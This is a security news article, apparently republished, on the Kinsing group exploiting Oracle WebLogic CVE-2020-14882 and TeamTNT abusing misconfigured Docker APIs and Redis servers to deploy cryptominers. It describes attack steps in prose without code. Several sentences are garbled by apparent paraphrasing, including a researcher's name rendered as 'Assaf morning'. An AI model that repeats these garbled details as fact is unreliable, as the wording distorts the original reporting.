Hackers Target WebLogic Servers and Docker APIs to Mine Cryptocurrencies – The Hacker News | Jewelry Dukan

Malicious actors like Kinsing use both recently discovered and legacy vulnerabilities in Oracle WebLogic Server to proliferate cryptocurrency-mining malware.

Cybersecurity firm Trend Micro said it found the financially motivated group was using the vulnerability to drop Python scripts with functionality to disable operating system (OS) security features such as Security-Enhanced Linux (SELinux) and others.

The operators behind the Kinsing malware have historically sought out vulnerable servers to co-opt into a botnet, including Redis, SaltStack, Log4Shell, Spring4Shell, and the Atlassian Confluence vulnerability (CVE-2022-26134).

Internet security

The Kinsing actors have also been involved in campaigns against container environments via misconfigured open Docker Daemon API ports to launch a crypto-miner and then spread the malware to other containers and hosts.

The latest wave of attacks involved the actor weaponizing CVE-2020-14882 (CVSS score: 9.8), a two-year-old Remote Code Execution (RCE) bug, against unpatched servers to gain control of the server take over and delete malicious payloads.

It is worth noting that the vulnerability has been exploited by several botnets in the past to distribute Monero miners and the Tsunami backdoor on infected Linux systems.

Successful exploitation of the bug was followed by deployment of a shell script responsible for a number of actions: removing the /var/log/syslog system log, disabling security features and cloud service agents from Alibaba and Tencent, and killing competing miners processes.

The shell script then proceeds to download the Kinsing malware from a remote server and also takes steps to ensure persistence using a cron job.

“Successful exploitation of this vulnerability could lead to RCE, which allows attackers to perform a variety of malicious activities on affected systems,” said Trend Micro. “This can range from running malware […] to stealing critical data and even taking complete control of a compromised machine.”

TeamTNT actors are making a comeback with Kangaroo Attack

The development comes as researchers at Aqua Security identified three new attacks linked to another “alive” cryptojacking group called TeamTNT, which voluntarily shut down in November 2021.

“TeamTNT checked for a misconfigured Docker daemon and deployed Alpine, a vanilla container image, with a command line to download a shell script (k.sh) to a C2 server,” said Aqua Security researcher Assaf morning

What is notable about the attack chain is that it appears to be designed to crack the SECP256K1 encryption, which if successful could give the actor the ability to compute the keys for each cryptocurrency wallet. In other words, the idea is to use the high but illegal processing power of its targets to run the ECDLP solver and get the key.

Internet security

Two other attacks carried out by the group involve exploiting exposed Redis servers and misconfigured Docker APIs to provide coin miners and Tsunami binaries.

TeamTNT’s alignment with Docker REST APIs has been well documented over the past year. But in an operational security flaw discovered by Trend Micro, credentials associated with two of the attacker-controlled DockerHub accounts were uncovered.

The accounts – alpineos and sandeep078 – are said to have been used to proliferate a variety of malicious payloads such as rootkits, Kubernetes exploit kits, credential stealers, XMRig Monero miners and even the Kinsing malware.

“The alpineos account was used three times in exploit attempts on our honeypots from mid-September to early October 2021, and we traced the IP addresses of the deployments to their location in Germany,” said Trend Micro’s Nitesh Surana.

“The threat actors were logged into their accounts in the DockerHub registry and likely forgot to log out.” Alternatively, “threat actors logged into their DockerHub account using alpineos’ credentials”.

Trend Micro said the malicious Alpineos image was downloaded more than 150,000 times and informed Docker of those accounts.

It also recommends organizations to configure the exposed REST API with TLS to mitigate attacker-in-the-middle (AiTM) attacks, and use credential stores and helpers to host user credentials.

Leave a Comment